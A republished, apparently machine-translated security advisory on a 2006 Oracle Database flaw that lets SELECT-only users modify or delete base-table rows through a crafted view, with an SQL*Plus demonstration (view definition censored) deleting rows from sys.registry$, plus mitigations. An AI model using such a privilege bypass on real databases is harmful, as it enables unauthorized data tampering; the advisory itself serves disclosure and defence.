Oracle Database Access Restriction Bypass Vulnerability

Source: Internet
Author: User

Affected Systems:Oracle Database 9.2.0.0-10.2.0.3

Description: Bugtraq id: 17426

Oracle is a large commercial database system. Oracle 9.2.0.0 to 10.2.0.3 allows users with only SELECT permission in the base table to insert, update, and delete data through a specially crafted view, low-Permission users who successfully exploit this vulnerability can insert, update, and delete data by creating a specially crafted view.

This vulnerability has a low impact on Oracle data dictionaries because most dictionary tables do not have a primary key, and the exploitation of this vulnerability requires a primary key.

Test Method:

Warning:The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Assume that dbsnmp only has the select any dictionary permission and cannot update Tables in the data DICTIONARY.

C: \> sqlplus dbsnmp/dbsnmp

SQL * Plus: Release 10.1.0.4.0-Production on Thu Apr 8 19:20:27 2006

Copyright (c) 1982,200 5, Oracle. All rights reserved.

Connected:

Oracle Database 10g Enterprise Edition Release 10.1.0.4.0

-Production With the Partitioning, OLAP and Data Mining options

SQL> select * from v $ version;

BANNER

Oracle Database 10g Enterprise Edition Release 10.1.0.4.0

-Prod PL/SQL Release 10.1.0.4.0-Production

CORE 10.1.0.4.0 Production

TNS for 32-bit Windows: Version 10.1.0.4.0

-Production NLSRTL Version 10.1.0.4.0-Production

SQL> -- the data cannot be deleted from the data dictionary)

SQL> delete from sys. registry $;

Delete from sys. registry $

*

ERROR at line 1:

ORA-01031: insufficient privileges

SQL> -- create a custom View

SQL> create or replace view e as select [... censored...];

View created.

SQL> -- discard data through the view !!! ==> Security Vulnerabilities !!!

SQL> delete from e;

17 rows deleted.

Suggested temporary solution:

If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Filter 9i to 10g R1 connection roles and delete create view and create database link permissions.

* Delete the primary key from the base table. Please note that this may cause performance and integrity problems.

Vendor patch: Oracle

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version.

Note: <* Source: Alexander Kornbrust ak@red-database-security.com) Link: http://marc.theaimsgroup.com /? L = bugtraq & m = 114468438319540 & w = 2 *>


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.